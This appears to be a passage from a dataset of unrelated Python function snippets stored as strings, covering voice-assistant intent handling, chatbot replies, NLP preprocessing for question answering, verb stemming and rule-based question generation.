self.__appreciation_action()\t\t\t#getting the function of the intent#checking the intent type\n return\n elif intent == 'music':\t\t\t#getting the function of the intent#checking the intent type\n self.__music_action(music_file)\t\t#getting the function of the intent#checking the intent type\n elif intent == 'navigation':\t\t\t#getting the function of the intent#checking the intent type\n self.__navigate_action()\n elif intent == 'tasks':\n self.__calender_events()\n\t\telif intent == 'guide':\n self.__guide()\n elif intent == 'web':\n self.__web()\n elif intent == 'video':\n self.__video()\n else: # No recognized intent\n self.__text_action(\"I'm sorry, I don't know about this yet.\")\n return\n\n except Exception as e:\n print \"Failed wit !\"\t\t\t#error message\n print(e)\t\t\t#printing the error\n traceback.print_exc()\n self.__text_action(\"I'm sorry, I couldn't understand what you mean !!\") #printing message\n return\t\t\t\t\n\n self.decide_action()", "def introduction(state_object, nlg_object):\n # intents = [\"greet\", \"goodbye\", \"deny\", \"exclaim_neg\", \"clarification_request\", \"ask_if_ended\", \"feedback_prompt\"]\n if state_object.previous_intent == \"\":\n templates = nlg_object.first_templates\n return random.choice(templates[\"intro\"])\n else:\n if state_object.previous_intent == \"goodbye\" or state_object.previous_intent == \"deny\" \\\n or state_object.previous_intent == \"exclaim_neg\":\n templates = nlg_object.goodbye_templates\n return random.choice(templates[\"goodbye\"])\n else:\n templates = nlg_object.intro_templates\n return random.choice(templates[state_object.intent])", "async def say(self, ctx, *args):\n if not args:\n await ctx.send('did you want me to say something?')\n return\n message = ' '.join(args)\n message = profanity_filter(message)\n await ctx.send(message)", "def test_kill_sentence(self):\n before_b = \"\"\"\\\n This is the first sentence. This\n is the second sentence. And\n this is the last sentence.\n \"\"\"\n after_b = \"\"\"\\\n This is the first sentence. And\n this is the last sentence.\n \"\"\"\n self.run_test(\n before_b=before_b,\n after_b=after_b,\n before_sel=(\"2.2\", \"2.2\"),\n after_sel=(\"1.27\", \"1.27\"),\n command_name=\"kill-sentence\",\n )", "def speech_callback(self, data):\n speech = data.data\n print \"RECEIVED SPEECH: \", speech\n if \"keyword detected\" in speech:\n if self.idling:\n self.control_pub.publish(\"ft go; idle stop; stt go\")\n self.behav_pub.publish(\"greet\")\n # self.behav_pub.publish(random.choice(categorized_behaviors['greeting']))\n elif \"play\" in speech:\n print \"STARTING GAME\"\n self.start_game = \"TTT\"\n elif \"bye\" in speech:\n self.control_pub.publish(\"idle go; stt go; stt_keyword go\")\n elif \"okay\" in speech:\n self.ok = True", "def __init__(self):\n self.sentence = []", "def add_sentence(self, sentence):\n for word in sentence.split(' '):\n self.add_word(word)", "def add_sentence(self, sentence):\n for word in sentence.split(' '):\n self.add_word(word)", "def convert_single_example(example, tokenizer, is_training, args):\n tok_to_orig_index = []\n orig_to_tok_index = []\n all_doc_tokens = [] # all subtokens of original doc after tokenizing\n features = []\n for (i, token) in enumerate(example['paragraph_tokens']):\n orig_to_tok_index.append(len(all_doc_tokens))\n sub_tokens = albert_tokenize(tokenizer, token)\n tok_to_orig_index.extend([i] * len(sub_tokens))\n all_doc_tokens.extend(sub_tokens)\n\n # 特别注意!由于在paragraph_tokens中我们的token已经映射过一次了\n # 这里wordpiece等于又映射了一遍,所以这里的操作是二次映射\n if example['position_map']:\n tok_to_orig_index = [example['position_map'][index] for index in tok_to_orig_index]\n\n # QUERY\n query_tokens = []\n query_tokens.append(\"[Q]\")\n query_tokens.extend(albert_tokenize(tokenizer, example['question_text']))\n if len(query_tokens) > args.max_query_length:\n query_tokens = query_tokens[-args.max_query_length:]\n\n # ANSWER 预处理的时候先长短分开\n tok_start_position = -1\n tok_end_position = -1\n # 这里终点是必然在para_tokens内的\n if is_training:\n # 现阶段,有短答案预测短答案,否则预测长答案\n if example['answer_type'] != AnswerType['UNKNOWN']:\n tok_long_start_position = orig_to_tok_index[example['long_start']]\n if example['long_end'] == len(orig_to_tok_index):\n tok_long_end_position = orig_to_tok_index[-1]\n else:\n tok_long_end_position = orig_to_tok_index[example['long_end']] - 1\n tok_start_position = tok_long_start_position\n tok_end_position = tok_long_end_position\n if example['answer_type'] == AnswerType['SHORT']:\n tok_short_start_position = orig_to_tok_index[example['short_start']]\n if example['short_end'] == len(orig_to_tok_index):\n tok_short_end_position = orig_to_tok_index[-1]\n else:\n tok_short_end_position = orig_to_tok_index[example['short_end']] - 1\n tok_start_position = tok_short_start_position\n tok_end_position = tok_short_end_position\n\n # Get max tokens number for original doc,\n # should minus query tokens number and 3 special tokens\n # The -3 accounts for [CLS], [SEP] and [SEP]\n max_tokens_for_doc = args.max_seq_length - len(query_tokens) - 3\n\n # We can have documents that are longer than the maximum sequence length.\n # To deal with this we do a sliding window approach, where we take chunks\n # of up to our max length with a stride of `doc_stride`.\n _DocSpan = collections.namedtuple(\"DocSpan\", [\"start\", \"length\"])\n doc_spans = []\n start_offset = 0\n while start_offset < len(all_doc_tokens):\n length = len(all_doc_tokens) - start_offset # compute number of tokens remaining unsliding\n length = min(length, max_tokens_for_doc) # determine current sliding window size\n doc_spans.append(_DocSpan(start=start_offset, length=length))\n\n # Consider case for reaching end of original doc\n if start_offset + length == len(all_doc_tokens):\n break\n start_offset += min(length, args.doc_stride)\n\n # Convert window + query + special tokens to feature\n for (doc_span_index, doc_span) in enumerate(doc_spans):\n tokens = []\n token_to_orig_map = {}\n token_is_max_context = {}\n segment_ids = []\n tokens.append(\"[CLS]\")\n segment_ids.append(0)\n tokens.extend(query_tokens)\n segment_ids.extend([0] * len(query_tokens))\n tokens.append(\"[SEP]\")\n segment_ids.append(0)\n\n for i in range(doc_span.length):\n split_token_index = doc_span.start + i\n token_to_orig_map[len(tokens)] = tok_to_orig_index[split_token_index]\n\n is_max_context = check_is_max_context(doc_spans, doc_span_index, split_token_index)\n token_is_max_context[len(tokens)] = is_max_context\n tokens.append(all_doc_tokens[split_token_index])\n segment_ids.append(1)\n tokens.append(\"[SEP]\")\n segment_ids.append(1)\n assert len(tokens) == len(segment_ids)\n\n input_ids = tokenizer.convert_tokens_to_ids(tokens)\n\n # The mask has 1 for real tokens and 0 for padding tokens. Only real\n # tokens are attended to.\n input_mask = [1] * len(input_ids)\n\n # Zero-pad up to the sequence length.\n padding = [0] * (args.max_seq_length - len(input_ids))\n input_ids.extend(padding)\n input_mask.extend(padding)\n segment_ids.extend(padding)\n\n assert len(input_ids) == args.max_seq_length\n assert len(input_mask) == args.max_seq_length\n assert len(segment_ids) == args.max_seq_length\n\n start_position = None\n end_position = None\n answer_type = None\n answer_text = \"\"\n if is_training:\n doc_start = doc_span.start\n doc_end = doc_span.start + doc_span.length - 1\n # For training, if our document chunk does not contain an annotation\n # we throw it out, since there is nothing to predict.\n contains_an_annotation = (tok_start_position >= doc_start and tok_end_position <= doc_end)\n # 负样本需要经过采样,且目标为[CLS]\n if (not contains_an_annotation) or example['answer_type'] == AnswerType['UNKNOWN']:\n if args.include_unknowns < 0 or random.random() > args.include_unknowns:\n continue\n start_position = 0\n end_position = 0\n answer_type = AnswerType['UNKNOWN']\n else:\n doc_offset = len(query_tokens) + 2\n start_position = tok_start_position - doc_start + doc_offset\n end_position = tok_end_position - doc_start + doc_offset\n answer_type = example['answer_type']\n\n # 如果是短答案,对一下答案是否正确\n if example['answer_type'] == AnswerType['SHORT']:\n answer_text = \" \".join(tokens[start_position:(end_position + 1)])\n answer_text = answer_text.replace(' ', '').replace(u\"▁\", ' ').strip()\n gt_answer = example['short_answer_text'].lower()\n answer_text_chars = [c for c in answer_text if c not in \" \\t\\r\\n\" and ord(c) != 0x202F]\n gt_answer_chars = [c for c in gt_answer if c not in \" \\t\\r\\n\" and ord(c) != 0x202F]\n if \"\".join(answer_text_chars) != \"\".join(gt_answer_chars):\n print(answer_text, 'V.S.', gt_answer)\n\n feature = InputFeatures(\n unique_id=None,\n example_index=None,\n doc_span_index=doc_span_index,\n tokens=tokens,\n token_to_orig_map=token_to_orig_map,\n token_is_max_context=token_is_max_context,\n input_ids=input_ids,\n input_mask=input_mask,\n segment_ids=segment_ids,\n start_position=start_position,\n end_position=end_position,\n answer_text=answer_text,\n answer_type=answer_type)\n\n features.append(feature)\n\n return features", "def extract_sentence(tensor, delimiter=\"\"):\n pass", "def handle(text, mic, profile):\n if 'motion' not in profile or 'binary' not in profile['motion'] or 'runfile' not in profile['motion']:\n mic.say('Motion does not seem to be set-up correctly.')\n mic.say('Please add motion binary and motion runfile configuration options to you profile.')\n return\n runfile = profile['motion']['runfile']\n binary = profile['motion']['binary']\n responses = ['Hey, something is wrong. I am not supposed to say this.']\n if bool(re.search(r'\\bstop\\b', text, re.IGNORECASE)):\n if os.path.isfile(runfile):\n stopMotion(runfile)\n responses = ['Have it your way.', 'Enjoy your privacy.', 'I will just close my eyes for a second.', 'You are not that interesting anyway.']\n else:\n responses = ['I was not looking at you.', 'You are delusional, nobody is watching.', 'It was not me. It was the N S A.']\n elif bool(re.search(r'\\bstart\\b', text, re.IGNORECASE)):\n if os.path.isfile(runfile):\n responses = ['Did you think I was not paying attention?', 'I am already watching.', 'I have been on guard duty for a while already.']\n else:\n startMotion(binary)\n responses = ['I will keep an eye on things.', 'I will guard this room.', 'I will keep careful watch.', 'I will keep my eyes wide open.']\n mic.say(random.choice(responses))", "def final_result(self, hyp, confidence):\n msg = String()\n msg.data = str(hyp.lower())\n rospy.loginfo(\n 'Detected string: %s',\n msg.data\n )\n # Stop recogniser until started again by hotword/reasoning\n self.stop()\n self.pub.publish(msg)\n self.split_text_into_logic_parts(msg.data)", "def test_same_sentence_check(self):\n block = get_text(SAMPLE_SENTENCE)\n self.assertTrue(same_sentence_check(block, 0, 98))\n self.assertFalse(same_sentence_check(block, 166, 168))", "def func(self):\n\n caller = self.caller\n\n if not self.args:\n caller.msg(\"Say what?\")\n return\n\n speech = self.args\n\n # calling the speech hook on the location\n speech = caller.location.at_say(caller, speech)\n\n # Feedback for the object doing the talking.\n caller.msg('You say, \"%s|n\"' % speech)\n\n # Build the string to emit to neighbors.\n emit_string = '%s says, \"%s|n\"' % ( getNameAnsi( caller ), speech )\n caller.location.msg_contents(text=(emit_string, {\"type\": \"say\"}),\n exclude=caller, from_obj=caller)", "def example():\n\n exam = Exam('Exam Example')\n \n exam.add_question('What is the capital of California?', 'Sacramento')\n exam.add_question('What is the capital of Ohio?', 'Columbus')\n exam.add_question('What is the capital of Hawaii?', 'Honolulu')\n exam.add_question('What is the capital of New Mexico?', 'Santa Fe')\n\n student = Student('Sarah', 'Stringer', '7 Casa Way')\n\n score = take_test(exam, student)\n\n return score", "def life_sentence(x): \n if x == 'Life':\n return 1\n else:\n return 0", "def add_start_end_label(self, data, type=1):\n new_utts = []\n if type == 1:\n for line in data:\n title = [\"<s>\"] + line[0] + [\"</s>\"]\n context = [\"<s>\"] + line[1] + [\"</s>\"]\n target = [\"<s>\"] + line[2] + [\"</s>\"]\n new_utts.append([title, context, target])\n\n elif type == 2:\n for line in data:\n title = [\"<s>\"] + line[0] + [\"</s>\"]\n context = [\"<s>\"] + line[1] + [\"</s>\"]\n target = [\"<s>\"] + line[2] + [\"</s>\"]\n sentiment = line[3]\n new_utts.append([title, context, target, sentiment])\n\n elif type == 3:\n for line in data:\n new_utts.append([[\"<s>\"] + list(line) + [\"/s\"]])\n\n else:\n print(\"Invalid type in process function\")\n return\n\n return new_utts", "def sentences(a, b):\n\n # TODO\n return []", "def verb_stem(s):\n \n #If the stem is have, its 3s form is has.\n if s == \"has\" :\n return \"have\"\n\n #If the stem ends in y preceded by a vowel, simply add s (pays, buys).\n elif re.match(r\"[A-z]+[aeiou][y]s\\b\", s):\n str = s[:-1]\n\n #If the stem ends in y preceded by a non-vowel and contains at least three letters, change the y to ies (flies, tries, unifies).\n elif re.match(r\"[A-z]+[^aeiou]ies\\b\", s):\n str = s[:-3] + 'y'\n\n #If the stem is of the form Xie where X is a single letter other than a vowel, simply add s (dies, lies, ties note that this doesnt account for unties).\n elif re.match(r\"[^aeiou]ies\\b\", s):\n str = s[:-1]\n\n #If the stem ends in o,x,ch,sh,ss or zz, add es (goes, boxes, attaches, washes, dresses, fizzes).\n elif re.match(r\"[A-z]+([ox]|[cs]h|[s]s|[z]z)es\\b\", s): \n str = s[:-2]\n\n #If the stem ends in se or ze but not in sse or zze, add s (loses, dazes, lapses, analyses).\n elif re.match(r\"[A-z]+([s][^s][e]|[z][^z][e])s\\b\", s):\n str = s[:-1]\n\n #If the stem ends in e not preceded by i,o,s,x,z,ch,sh, just add s (likes, hates, bathes).\n elif re.match(r\"[A-z]+([^iosxz]|[^ch]|[^sh])es\\b\", s):\n str = s[:-1]\n \n #If the stem ends in anything except s,x,y,z,ch,sh or a vowel, add s (eats, tells, shows)\n elif re.match(r\"[A-z]+([^sxyzaeiou]|[^cs]h)s\\b\", s):\n str = s[:-1]\n\n else: \n str = \"\"\n\n\n matches = [(w, t) for (w, t) in vb_list if (w == s or w == str)]\n\n tag_s = [(w, t) for (w, t) in matches if w == s and t == 'VBZ']\n\n if tag_s == True:\n return str\n else:\n tag_str = [t for (w, t) in matches if w == str and t == 'VB']\n\n if not (tag_s or tag_str):\n str = \"\"\n\n return str", "async def saytext(self,ctx):\r\n if await bMsg(ctx,ctx.message.author.name,client):\r\n return\r\n logger.info('Games.saytext', extra={'invoker': ctx.message.author.name})\r\n await ctx.send(wordsDict.generate())", "def gen_Modal_Question(keyword_dic_sents):\n try:\n # txt = TextBlob(string)\n # for line in txt.sentences:\n for key in keyword_dic_sents.keys():\n \"\"\"\n outputs question from the given text\n \"\"\"\n # print(keyword_dic_sents[line])\n # print(entity.text, entity.label_)\n\n answers.append(key)\n # print(key)\n for sentence in keyword_dic_sents[key]:\n # print(sentence)\n if type(sentence) is str: # If the passed variable is of type string.\n line = TextBlob(sentence) # Create object of type textblob.blob.TextBlob\n # print(line)\n bucket = {} # Create an empty dictionary\n\n for i, j in enumerate(line.tags): # line.tags are the parts-of-speach in English\n if j[1] not in bucket:\n bucket[j[1]] = i # Add all tags to the dictionary or bucket variable\n\n question = '' # Create an empty string\n\n # With the use of conditional statements the dictionary is compared with the list created above\n # print(line.tags)\n #####################################################################gen modal ##########################################################################################\n ######################################## VBN ##################################################\n if all(key in bucket for key in VBNDT1): # 'NNP', 'VBZ' ,'VBN' , 'IN , 'DT' in sentence.\n if line.words[bucket['NN']] != j[0]:\n question = 'Has' + ' ' + line.words[bucket['NNP']] + ' ' + line.words[\n bucket['VBN']] + ' ' + line.words[bucket['NN']] + ' ' + line.words[bucket['IN']] + ' ' + \\\n line.words[bucket['DT']] + ' ' + j[0] + '?'\n pattern_name = 'VBNDT1'\n questions.append(question)\n\n elif all(key in bucket for key in VBNIN1): # 'NNP', 'VBZ' ,'VBN' in sentence.\n if line.words[bucket['NN']] != j[0]:\n question = 'Has' + ' ' + line.words[bucket['NNP']] + ' ' + line.words[\n bucket['VBN']] + ' ' + line.words[bucket['NN']] + ' ' + line.words[bucket['IN']] + ' ' + j[\n 0] + '?'\n pattern_name = 'VBNIN1'\n questions.append(question)\n\n\n elif all(key in bucket for key in VBN1): # 'NNP', 'VBZ' ,'VBN' in sentence.\n question = 'Has' + ' ' + line.words[bucket['NNP']] + ' ' + line.words[\n bucket['VBN']] + ' ' + line.words[bucket['NN']] + ' ' + '?'\n pattern_name = 'VBN1'\n questions.append(question)\n\n # -----------------------------------------------------------------------------------------#\n elif all(key in bucket for key in VBNDT2): # 'PRP', 'VBZ' ,'VBN' in sentence.\n if line.words[bucket['NN']] != j[0]:\n question = 'Has' + ' ' + line.words[bucket['PRP']] + ' ' + line.words[\n bucket['VBN']] + ' ' + line.words[bucket['NN']] + ' ' + line.words[bucket['IN']] + ' ' + \\\n line.words[bucket['DT']] + ' ' + j[0] + '?'\n pattern_name = 'VBNDT2'\n questions.append(question)\n\n elif all(key in bucket for key in VBNIN2): # 'PRP', 'VBZ' ,'VBN' in sentence.\n if line.words[bucket['NN']] != j[0]:\n question = 'Has' + ' ' + line.words[bucket['PRP']] + ' ' + line.words[\n bucket['VBN']] + ' ' + line.words[bucket['NN']] + ' ' + line.words[bucket['IN']] + ' ' + j[\n 0] + '?'\n pattern_name = 'VBNIN2'\n questions.append(question)\n\n elif all(key in bucket for key in VBN2): # 'PRP', 'VBZ' ,'VBN' in sentence.\n question = 'Has' + ' ' + line.words[bucket['PRP']] + ' ' + line.words[\n bucket['VBN']] + ' ' + line.words[bucket['NN']] + ' ' + '?'\n pattern_name = 'VBN2'\n questions.append(question)\n\n # -----------------------------------------------------------------------------------------#\n elif all(key in bucket for key in VBNDT3): # 'NNP', 'VBP' ,'VBN' in sentence.\n if line.words[bucket['NN']] != j[0]:\n question = 'Have' + ' ' + line.words[bucket['NNPS']] + ' ' + line.words[\n bucket['VBN']] + ' ' + line.words[bucket['NN']] + ' ' + line.words[bucket['IN']] + ' ' + \\\n line.words[bucket['DT']] + ' ' + j[0] + '?'\n pattern_name = 'VBNDT3'\n questions.append(question)\n\n elif all(key in bucket for key in VBNIN3): # 'NNP', 'VBP' ,'VBN' in sentence.\n if line.words[bucket['NN']] != j[0]:\n question = 'Have' + ' ' + line.words[bucket['NNPS']] + ' ' + line.words[\n bucket['VBN']] + ' ' + line.words[bucket['NN']] + ' ' + line.words[bucket['IN']] + ' ' + j[\n 0] + '?'\n pattern_name = 'VBNIN3'\n questions.append(question)\n\n elif all(key in bucket for key in VBN3): # 'NNP', 'VBP' ,'VBN' in sentence.\n question = 'Have' + ' ' + line.words[bucket['NNPS']] + ' ' + line.words[\n bucket['VBN']] + ' ' + line.words[bucket['NN']] + ' ' + '?'\n pattern_name = 'VBN3'\n questions.append(question)\n\n # -----------------------------------------------------------------------------------------#\n elif all(key in bucket for key in VBNDT4): # 'PRP', 'VBP' ,'VBN' in sentence.\n if line.words[bucket['NN']] != j[0]:\n question = 'Have' + ' ' + line.words[bucket['PRP']] + ' ' + line.words[\n bucket['VBN']] + ' ' + line.words[bucket['NN']] + ' ' + line.words[bucket['IN']] + ' ' + \\\n line.words[bucket['DT']] + ' ' + j[0] + '?'\n pattern_name = 'VBNDT4'\n questions.append(question)\n\n elif all(key in bucket for key in VBNIN4): # 'PRP', 'VBP' ,'VBN' in sentence.\n if line.words[bucket['NN']] != j[0]:\n question = 'Have' + ' ' + line.words[bucket['PRP']] + ' ' + line.words[\n bucket['VBN']] + ' ' + line.words[bucket['NN']] + ' ' + line.words[bucket['IN']] + ' ' + j[\n 0] + '?'\n pattern_name = 'VBNIN4'\n questions.append(question)\n\n elif all(key in bucket for key in VBN4): # 'PRP', 'VBP' ,'VBN' in sentence.\n question = 'Have' + ' ' + line.words[bucket['PRP']] + ' ' + line.words[\n bucket['VBN']] + ' ' + line.words[bucket['NN']] + ' ' + '?'\n pattern_name = 'VBN4'\n questions.append(question)\n # -----------------------------------------------------------------------------------------#\n elif all(key in bucket for key in VBNDT5): # 'NNP', 'VBD' ,'VBN' in sentence.\n if line.words[bucket['NN']] != j[0]:\n question = 'Had' + ' ' + line.words[bucket['NNP']] + ' ' + line.words[\n bucket['VBN']] + ' ' + line.words[bucket['NN']] + ' ' + line.words[bucket['IN']] + ' ' + \\\n line.words[bucket['DT']] + ' ' + j[0] + '?'\n pattern_name = 'VBNDT5'\n questions.append(question)\n\n elif all(key in bucket for key in VBNIN5): # 'NNP', 'VBD' ,'VBN' in sentence.\n if line.words[bucket['NN']] != j[0]:\n question = 'Had' + ' ' + line.words[bucket['NNP']] + ' ' + line.words[\n bucket['VBN']] + ' ' + line.words[bucket['NN']] + ' ' + line.words[bucket['IN']] + ' ' + j[\n 0] + '?'\n pattern_name = 'VBNIN5'\n questions.append(question)\n\n elif all(key in bucket for key in VBN5): # 'NNP', 'VBD' ,'VBN' in sentence.\n question = 'Had' + ' ' + line.words[bucket['NNP']] + ' ' + line.words[\n bucket['VBN']] + ' ' + line.words[bucket['NN']] + ' ' + '?'\n pattern_name = 'VBN5'\n questions.append(question)\n # -----------------------------------------------------------------------------------------#\n elif all(key in bucket for key in VBNDT6): # 'PRP', 'VBD' ,'VBN' in sentence.\n if line.words[bucket['NN']] != j[0]:\n question = 'Had' + ' ' + line.words[bucket['PRP']] + ' ' + line.words[\n bucket['VBN']] + ' ' + line.words[bucket['NN']] + ' ' + line.words[bucket['IN']] + ' ' + \\\n line.words[bucket['DT']] + ' ' + j[0] + '?'\n pattern_name = 'VBNDT6'\n questions.append(question)\n\n elif all(key in bucket for key in VBNIN6): # 'PRP', 'VBD' ,'VBN' in sentence.\n if line.words[bucket['NN']] != j[0]:\n question = 'Had' + ' ' + line.words[bucket['PRP']] + ' ' + line.words[\n bucket['VBN']] + ' ' + line.words[bucket['NN']] + ' ' + line.words[bucket['IN']] + ' ' + j[\n 0] + '?'\n pattern_name = 'VBNIN6'\n questions.append(question)\n\n elif all(key in bucket for key in VBN6): # 'PRP', 'VBD' ,'VBN' in sentence.\n question = 'Had' + ' ' + line.words[bucket['PRP']] + ' ' + line.words[\n bucket['VBN']] + ' ' + line.words[bucket['NN']] + ' ' + '?'\n pattern_name = 'VBN6'\n questions.append(question)\n\n # -----------------------------------------------------------------------------------------#\n elif all(key in bucket for key in VBNDT7): # 'NNPS', 'VBD' ,'VBN' in sentence.\n if line.words[bucket['NN']] != j[0]:\n question = 'Had' + ' ' + line.words[bucket['NNPS']] + ' ' + line.words[\n bucket['VBN']] + ' ' + line.words[bucket['NN']] + ' ' + line.words[bucket['IN']] + ' ' + \\\n line.words[bucket['DT']] + ' ' + j[0] + '?'\n pattern_name = 'VBNDT7'\n questions.append(question)\n\n elif all(key in bucket for key in VBNIN7): # 'NNPS', 'VBD' ,'VBN' in sentence.\n if line.words[bucket['NN']] != j[0]:\n question = 'Had' + ' ' + line.words[bucket['NNPS']] + ' ' + line.words[\n bucket['VBN']] + ' ' + line.words[bucket['NN']] + ' ' + line.words[bucket['IN']] + ' ' + j[\n 0] + '?'\n pattern_name = 'VBNIN7'\n questions.append(question)\n\n elif all(key in bucket for key in VBN7): # 'NNPS', 'VBD' ,'VBN' in sentence.\n question = 'Had' + ' ' + line.words[bucket['NNPS']] + ' ' + line.words[\n bucket['VBN']] + ' ' + line.words[bucket['NN']] + ' ' + '?'\n pattern_name = 'VBN7'\n questions.append(question)\n\n # -----------------------------------------------------------------------------------------#\n elif all(key in bucket for key in VBNDT8): # 'NNPS', 'VBD' ,'VBN' in sentence.\n if line.words[bucket['NN']] != j[0]:\n question = 'Have' + ' ' + line.words[bucket['NNS']] + ' ' + line.words[\n bucket['VBN']] + ' ' + line.words[bucket['NN']] + ' ' + line.words[bucket['IN']] + ' ' + \\\n line.words[bucket['DT']] + ' ' + j[0] + '?'\n pattern_name = 'VBNDT8'\n questions.append(question)\n\n elif all(key in bucket for key in VBNIN8): # 'NNPS', 'VBD' ,'VBN' in sentence.\n if line.words[bucket['NN']] != j[0]:\n question = 'Have' + ' ' + line.words[bucket['NNS']] + ' ' + line.words[\n bucket['VBN']] + ' ' + line.words[bucket['NN']] + ' ' + line.words[bucket['IN']] + ' ' + j[\n 0] + '?'\n pattern_name = 'VBNIN8'\n questions.append(question)\n\n elif all(key in bucket for key in VBN8): # 'NNPS', 'VBD' ,'VBN' in sentence.\n question = 'Have' + ' ' + line.words[bucket['NNS']] + ' ' + line.words[\n bucket['VBN']] + ' ' + line.words[bucket['NN']] + ' ' + '?'\n pattern_name = 'VBN8'\n questions.append(question)\n\n # -----------------------------------------------------------------------------------------#\n elif all(key in bucket for key in VBNDT9): # 'NNPS', 'VBD' ,'VBN' in sentence.\n if line.words[bucket['NN']] != j[0]:\n question = 'Has' + ' ' + line.words[bucket['NN']] + ' ' + line.words[\n bucket['VBN']] + ' ' + 'anything' + ' ' + line.words[bucket['IN']] + ' ' + line.words[\n bucket['DT']] + ' ' + j[0] + '?'\n pattern_name = 'VBNDT9'\n questions.append(question)\n\n elif all(key in bucket for key in VBNIN9): # 'NNPS', 'VBD' ,'VBN' in sentence.\n if line.words[bucket['NN']] != j[0]:\n question = 'Has' + ' ' + line.words[bucket['NN']] + ' ' + line.words[\n bucket['VBN']] + ' ' + 'anything' + ' ' + line.words[bucket['IN']] + ' ' + j[0] + '?'\n pattern_name = 'VBNIN9'\n questions.append(question)\n\n elif all(key in bucket for key in VBN9): # 'NNPS', 'VBD' ,'VBN' in sentence.\n if line.words[bucket['NN']] != j[0]:\n question = 'Has' + ' ' + line.words[bucket['NN']] + ' ' + line.words[\n bucket['VBN']] + ' ' + j[0] + ' ' + '?'\n pattern_name = 'VBN9'\n questions.append(question)\n\n # -----------------------------------------------------------------------------------------#\n\n ########################################### End VBN ##################################?????????????????????????!!!!!!!!!!!!!!!!!!'''\n\n ########################################### present continouse #############################\n elif all(key in bucket for key in PRCDT1): # 'NNP', 'VBG', 'VBZ', 'IN' in sentence.\n if line.words[bucket['NN']] != j[0]:\n question = 'Is' + ' ' + line.words[bucket['NNP']] + ' ' + line.words[bucket['VBG']] + ' ' + \\\n line.words[\n bucket['NN']] + ' ' + line.words[bucket['IN']] + ' ' + line.words[\n bucket['DT']] + ' ' + j[0] + '?'\n pattern_name = 'PRCDT1'\n questions.append(question)\n\n elif all(key in bucket for key in PRCIN1): # 'NNP', 'VBG', 'VBZ', 'IN' in sentence.\n if line.words[bucket['NN']] != j[0]:\n question = 'Is' + ' ' + line.words[bucket['NNP']] + ' ' + line.words[bucket['VBG']] + ' ' + \\\n line.words[bucket['NN']] + ' ' + line.words[bucket['IN']] + ' ' + j[0] + '?'\n pattern_name = 'PRCIN1'\n questions.append(question)\n\n\n elif all(key in bucket for key in PRC1): # 'NNP', 'VBG', 'VBZ', 'IN' in sentence.\n question = 'Is' + ' ' + line.words[bucket['NNP']] + ' ' + line.words[\n bucket['VBG']] + ' ' + line.words[bucket['NN']] + ' ' + '?'\n pattern_name = 'PRC1'\n questions.append(question)\n\n # -----------------------------------------------------------------------------------------------------------#\n elif all(key in bucket for key in PRCDT2): # 'NNP', 'VBG', 'VBZ' in sentence.\n if line.words[bucket['NN']] != j[0]:\n question = 'Are' + ' ' + line.words[bucket['NNPS']] + ' ' + line.words[bucket['VBG']] + ' ' + \\\n line.words[bucket['NN']] + ' ' + line.words[bucket['IN']] + ' ' + line.words[\n bucket['DT']] + ' ' + j[0] + '?'\n pattern_name = \"PRCDT2\"\n questions.append(question)\n\n elif all(key in bucket for key in PRCIN2): # 'NNP', 'VBG', 'VBZ' in sentence.\n if line.words[bucket['NN']] != j[0]:\n question = 'Are' + ' ' + line.words[bucket['NNPS']] + ' ' + line.words[bucket['VBG']] + ' ' + \\\n line.words[bucket['NN']] + ' ' + line.words[bucket['IN']] + ' ' + j[0] + '?'\n pattern_name = \"PRCIN2\"\n questions.append(question)\n\n elif all(key in bucket for key in PRC2): # 'NNP', 'VBG', 'VBZ' in sentence.\n question = 'Are' + ' ' + line.words[bucket['NNPS']] + ' ' + line.words[\n bucket['VBG']] + ' ' + line.words[bucket['NN']] + ' ' + '?'\n pattern_name = \"PRC2\"\n questions.append(question)\n\n # -----------------------------------------------------------------------------------------------------------#\n elif all(key in bucket for key in PRCDT3): # 'NNPS', 'VBG', 'VBP', 'IN' in sentence.\n if line.words[bucket['NN']] != j[0]:\n question = 'Is' + ' ' + line.words[bucket['PRP']] + ' ' + line.words[\n bucket['VBG']] + ' ' + line.words[bucket['NN']] + ' ' + line.words[bucket['IN']] + ' ' + \\\n line.words[\n bucket['DT']] + ' ' + j[0] + '?'\n pattern_name = \"PRCDT3\"\n questions.append(question)\n\n elif all(key in bucket for key in PRCIN3): # 'NNPS', 'VBG', 'VBP', 'IN' in sentence.\n if line.words[bucket['NN']] != j[0]:\n question = 'Is' + ' ' + line.words[bucket['PRP']] + ' ' + line.words[\n bucket['VBG']] + ' ' + line.words[bucket['NN']] + ' ' + line.words[bucket['IN']] + ' ' + j[\n 0] + '?'\n pattern_name = \"PRCIN3\"\n questions.append(question)\n\n elif all(key in bucket for key in PRC3): # 'NNPS', 'VBG', 'VBP', 'IN' in sentence.\n question = 'Is' + ' ' + line.words[bucket['PRP']] + ' ' + line.words[\n bucket['VBG']] + ' ' + line.words[bucket['NN']] + ' ' + '?'\n pattern_name = \"PRC3\"\n questions.append(question)\n\n # -----------------------------------------------------------------------------------------------------------#\n elif all(key in bucket for key in PRCDT4): # 'NNPS', 'VBG', 'VBP' in sentence.\n if line.words[bucket['NN']] != j[0]:\n question = 'Are' + ' ' + line.words[bucket['PRP']] + ' ' + line.words[\n bucket['VBG']] + ' ' + line.words[bucket['NN']] + ' ' + line.words[bucket['IN']] + ' ' + \\\n line.words[bucket['DT']] + ' ' + j[0] + '?'\n pattern_name = \"PRCDT4\"\n questions.append(question)\n\n elif all(key in bucket for key in PRCIN4): # 'NNPS', 'VBG', 'VBP' in sentence.\n if line.words[bucket['NN']] != j[0]:\n question = 'Are' + ' ' + line.words[bucket['PRP']] + ' ' + line.words[\n bucket['VBG']] + ' ' + line.words[bucket['NN']] + ' ' + line.words[bucket['IN']] + ' ' + j[\n 0] + '?'\n pattern_name = \"PRCIN4\"\n questions.append(question)\n\n elif all(key in bucket for key in PRC4): # 'NNPS', 'VBG', 'VBP' in sentence.\n question = 'Are' + ' ' + line.words[bucket['PRP']] + ' ' + line.words[\n bucket['VBG']] + ' ' + line.words[bucket['NN']] + ' ' + '?'\n pattern_name = \"PRC4\"\n questions.append(question)\n\n # -----------------------------------------------------------------------------------------------------------#\n elif all(key in bucket for key in PRCDT5): # 'NNPS', 'VBG', 'VBP', 'IN' in sentence.\n if line.words[bucket['NN']] != j[0]:\n question = 'Is' + ' ' + line.words[bucket['NN']] + ' ' + line.words[\n bucket['VBG']] + ' ' + \"anything\" + ' ' + line.words[\n bucket['IN']] + ' ' + line.words[bucket['DT']] + ' ' + j[0] + '?'\n pattern_name = \"PRCDT5\"\n questions.append(question)\n\n elif all(key in bucket for key in PRCIN5): # 'NNPS', 